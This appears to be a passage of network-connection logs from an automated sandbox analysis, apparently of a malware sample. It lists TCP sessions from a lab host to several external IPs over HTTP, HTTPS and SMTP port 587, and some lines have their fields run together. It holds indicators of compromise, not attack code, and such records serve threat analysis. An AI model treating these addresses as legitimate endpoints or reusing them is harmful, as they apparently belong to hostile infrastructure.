                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.615526915 CET4983080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.665091038 CET4983080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.670459986 CET804983054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.810534000 CET4983780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.817949057 CET804983744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.818054914 CET4983780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.818221092 CET4983780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.818324089 CET4983780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.825486898 CET804983744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.825608969 CET804983744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.288743019 CET804983744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.288991928 CET804983744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.289632082 CET4983780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.296703100 CET4983780192.168.2.544.221.84.105
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 10:25:15.301788092 CET  80           49837      44.221.84.105    192.168.2.5
Nov 20, 2024 10:25:15.701303959 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:15.706490040 CET  80           49839      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:15.706604004 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:15.744978905 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:15.745100021 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:15.750613928 CET  80           49839      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:15.750627041 CET  80           49839      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:16.215507984 CET  80           49839      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:16.215567112 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.489435911 CET  49839        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.497554064 CET  80           49839      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:16.575442076 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.581381083 CET  80           49844      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:16.581702948 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.597333908 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.597368002 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:16.606463909 CET  80           49844      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:16.606475115 CET  80           49844      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:17.078846931 CET  80           49844      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:17.078910112 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:17.086546898 CET  49844        80         192.168.2.5      172.234.222.138
Nov 20, 2024 10:25:17.091617107 CET  80           49844      172.234.222.138  192.168.2.5
Nov 20, 2024 10:25:17.411434889 CET  49850        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:17.416513920 CET  80           49850      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:17.416594982 CET  49850        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:17.416853905 CET  49850        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:17.416897058 CET  49850        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:17.421945095 CET  80           49850      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:17.421957016 CET  80           49850      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:18.825320005 CET  80           49850      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:18.825340033 CET  80           49850      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:18.825406075 CET  49850        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:21.286868095 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:21.294400930 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:21.295808077 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:21.297322035 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:21.297322035 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:21.304759026 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:21.304783106 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:22.013844967 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:22.013864040 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:22.013927937 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:22.047215939 CET  49872        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:22.052140951 CET  80           49872      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:22.297902107 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:22.302779913 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:22.302846909 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:22.322509050 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:22.323448896 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:22.331056118 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:22.331851959 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:23.710129976 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:23.710146904 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:23.710335970 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:24.362582922 CET  49878        80         192.168.2.5      18.141.10.107
Nov 20, 2024 10:25:24.368721008 CET  80           49878      18.141.10.107    192.168.2.5
Nov 20, 2024 10:25:24.530374050 CET  49888        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.536449909 CET  80           49888      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:24.536539078 CET  49888        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.558749914 CET  49888        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.558842897 CET  49888        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.564980984 CET  80           49888      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:24.565071106 CET  80           49888      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:24.835270882 CET  49888        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.942137003 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.948849916 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:24.948920965 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.955837965 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.955837965 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:24.960841894 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:24.960859060 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:25.653485060 CET  49900        443        192.168.2.5      172.67.74.152
Nov 20, 2024 10:25:25.653533936 CET  443          49900      172.67.74.152    192.168.2.5
Nov 20, 2024 10:25:25.653609037 CET  49900        443        192.168.2.5      172.67.74.152
Nov 20, 2024 10:25:25.655596972 CET  49900        443        192.168.2.5      172.67.74.152
Nov 20, 2024 10:25:25.655616045 CET  443          49900      172.67.74.152    192.168.2.5
Nov 20, 2024 10:25:25.667771101 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:25.667820930 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:25.667876005 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:25.675936937 CET  49894        80         192.168.2.5      54.244.188.177
Nov 20, 2024 10:25:25.680737019 CET  80           49894      54.244.188.177   192.168.2.5
Nov 20, 2024 10:25:25.841073990 CET  49901        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:25:25.846730947 CET  80           49901      44.221.84.105    192.168.2.5
Nov 20, 2024 10:25:25.848386049 CET  49901        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:25:25.848561049 CET  49901        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:25:25.848697901 CET  49901        80         192.168.2.5      44.221.84.105
Nov 20, 2024 10:25:25.853396893 CET  80           49901      44.221.84.105    192.168.2.5
Nov 20, 2024 10:25:25.853631020 CET  80           49901      44.221.84.105    192.168.2.5
Nov 20, 2024 10:25:26.132276058 CET  443          49900      172.67.74.152    192.168.2.5
Nov 20, 2024 10:25:26.132340908 CET  49900        443        192.168.2.5      172.67.74.152
Nov 20, 2024 10:25:26.136001110 CET  49900        443        192.168.2.5      172.67.74.152
Nov 20, 2024 10:25:26.136010885 CET  443          49900      172.67.74.152    192.168.2.5
Nov 20, 2024 10:25:26.136293888 CET  443          49900      172.67.74.152    192.168.2.5
Nov 20, 2024 10:25:26.187454939 CET  49900        443        192.168.2.5      172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.231338978 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297063112 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297157049 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297465086 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.313277960 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332681894 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332839966 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332894087 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.357625008 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.362689018 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.557272911 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.562303066 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.562388897 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.570707083 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.570730925 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.053684950 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.054368019 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.133711100 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.140731096 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.357269049 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.364352942 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.364422083 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.374283075 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.374444962 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.423280954 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858709097 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858788013 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858829975 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.866627932 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.940220118 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945256948 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.950393915 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.950404882 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.359961987 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360025883 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360389948 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360485077 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.365362883 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.696568966 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.704225063 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.704308987 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709470987 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709494114 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.717371941 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.717385054 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.728566885 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.735843897 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.736205101 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494328022 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494544029 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.499407053 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681730032 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681977987 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.687107086 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.870675087 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.871189117 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.876166105 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069087029 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069112062 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069123983 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069226027 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.071588993 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.078571081 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.260253906 CET5874992651.195.88.199192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 10:25:31.264681101 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:31.271531105 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.451165915 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.462101936 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:31.467004061 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.651701927 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.652410984 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:31.663172007 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.851701975 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:31.852292061 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:31.857332945 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.039088964 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.039355993 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.044228077 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.231213093 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.231442928 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.236450911 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.419730902 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.430525064 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.430613041 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.430640936 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.430665016 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.438774109 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.438792944 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.438802958 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.710812092 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:32.761594057 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.796344042 CET  49925        80         192.168.2.5      82.112.184.197
Nov 20, 2024 10:25:32.813613892 CET  49950        80         192.168.2.5      82.112.184.197
Nov 20, 2024 10:25:32.818597078 CET  80           49950      82.112.184.197   192.168.2.5
Nov 20, 2024 10:25:32.818727016 CET  49950        80         192.168.2.5      82.112.184.197
Nov 20, 2024 10:25:32.818851948 CET  49950        80         192.168.2.5      82.112.184.197
Nov 20, 2024 10:25:32.818862915 CET  49950        80         192.168.2.5      82.112.184.197
Nov 20, 2024 10:25:32.823782921 CET  80           49950      82.112.184.197   192.168.2.5
Nov 20, 2024 10:25:32.823800087 CET  80           49950      82.112.184.197   192.168.2.5
Nov 20, 2024 10:25:32.892328978 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:32.899961948 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:33.080282927 CET  587          49926      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:33.080980062 CET  49926        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:33.082040071 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:33.087080002 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:33.087249994 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:33.829225063 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:33.843178034 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:33.848078966 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.026179075 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.030335903 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.035286903 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.211302042 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.211842060 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.216893911 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.401724100 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.401870966 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.401885033 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.401932001 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.403935909 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.411133051 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.586982012 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.588373899 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.595917940 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.769275904 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.769553900 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.775279999 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.951059103 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:34.951330900 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:34.956291914 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.137931108 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.138159990 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.144937992 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.326802015 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.327023983 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.332077980 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.512717962 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.512898922 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.517889977 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.693423986 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.698293924 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.698293924 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.698352098 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.698352098 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699234009 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699234009 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699338913 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699354887 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699354887 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.699387074 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:35.703288078 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.703334093 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.704158068 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.704250097 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.704262972 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.704277039 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.886480093 CET  587          49953      51.195.88.199    192.168.2.5
Nov 20, 2024 10:25:35.933541059 CET  49953        587        192.168.2.5      51.195.88.199
Nov 20, 2024 10:25:40.831506968 CET  49950        80         192.168.2.5      82.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.039987087 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.045109034 CET805000582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.045172930 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.069530010 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.069550991 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.074528933 CET805000582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.074539900 CET805000582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.431437016 CET805000582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.433223963 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.480319977 CET5000580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.489062071 CET805000582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.830245972 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.896775007 CET805001082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.896862030 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.903178930 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.903198004 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.908246040 CET805001082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.908277035 CET805001082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.289360046 CET805001082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.289427042 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.303792953 CET5001080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.312784910 CET805001082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.465502977 CET5001180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.470562935 CET805001147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.470699072 CET5001180192.168.2.547.129.31.212
